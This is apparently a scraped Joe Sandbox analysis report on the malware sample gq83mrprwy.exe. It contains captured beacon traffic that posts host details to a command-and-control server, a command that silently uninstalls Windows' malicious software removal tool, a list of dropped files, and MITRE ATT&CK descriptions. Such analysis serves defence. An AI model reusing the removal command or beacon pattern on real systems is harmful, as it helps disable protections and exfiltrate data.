25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49764	145.14.144.253	443	4488	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:49:28 UTC	197	OUT	POST /api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 500 Content-Type: application/json Host: pachydermal-deviati.000webhostapp.com User-Agent: cpp-httplib/0.12.6
2024-04-26 14:49:28 UTC	500	OUT	Data Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 36 30 Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60
2024-04-26 14:49:29 UTC	304	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 14:49:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Robots-Tag: noindex, nofollow Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: e1e42ee8aec5ece4a52bc7cee58361f8
2024-04-26 14:49:29 UTC	7	IN	Data Raw: 32 0d 0a 7b 7d 0d 0a Data Ascii: 2{}
2024-04-26 14:49:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49774	145.14.144.16	443	4488	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:50:29 UTC	197	OUT	POST /api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 501 Content-Type: application/json Host: pachydermal-deviati.000webhostapp.com User-Agent: cpp-httplib/0.12.6
2024-04-26 14:50:29 UTC	501	OUT	Data Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 31 32 Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":12
2024-04-26 14:50:29 UTC	304	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 14:50:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Robots-Tag: noindex, nofollow Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: f0039a40895a274f1d22ddc0067a69e3
2024-04-26 14:50:29 UTC	7	IN	Data Raw: 32 0d 0a 7b 7d 0d 0a Data Ascii: 2{}
2024-04-26 14:50:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49782	145.14.144.16	443	4488	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:51:28 UTC	197	OUT	POST /api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 500 Content-Type: application/json Host: pachydermal-deviati.000webhostapp.com User-Agent: cpp-httplib/0.12.6
2024-04-26 14:51:28 UTC	500	OUT	Data Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 31 38 Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":18
2024-04-26 14:51:28 UTC	304	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 14:51:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Robots-Tag: noindex, nofollow Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 450f45adaf79694493bbe493c05e21de
2024-04-26 14:51:28 UTC	7	IN	Data Raw: 32 0d 0a 7b 7d 0d 0a Data Ascii: 2{}
2024-04-26 14:51:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:48:02
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\gq83mrprwy.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gq83mrprwy.exe"
Imagebase:	0x7ff7970c0000
File size:	2'653'184 bytes
MD5 hash:	3B43DA1BE0C39802B78F6B2C55C4D7E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	16:48:06
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	16:48:07
Start date:	26/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	16:48:14
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7c00d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	16:48:15
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	33
Start time:	16:48:26
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7c00d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	45
Start time:	16:48:27
Start date:	26/04/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff690770000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	1975
Total number of Limit Nodes:	2

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1620
Total number of Limit Nodes:	2

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	823
Total number of Limit Nodes:	2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gq83mrprwy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Change of critical system settings

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jmoybgc.rvl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skicw24l.u32.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj0bgugp.vym.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wty1ecep.ckh.psm1

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
gq83mrprwy.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre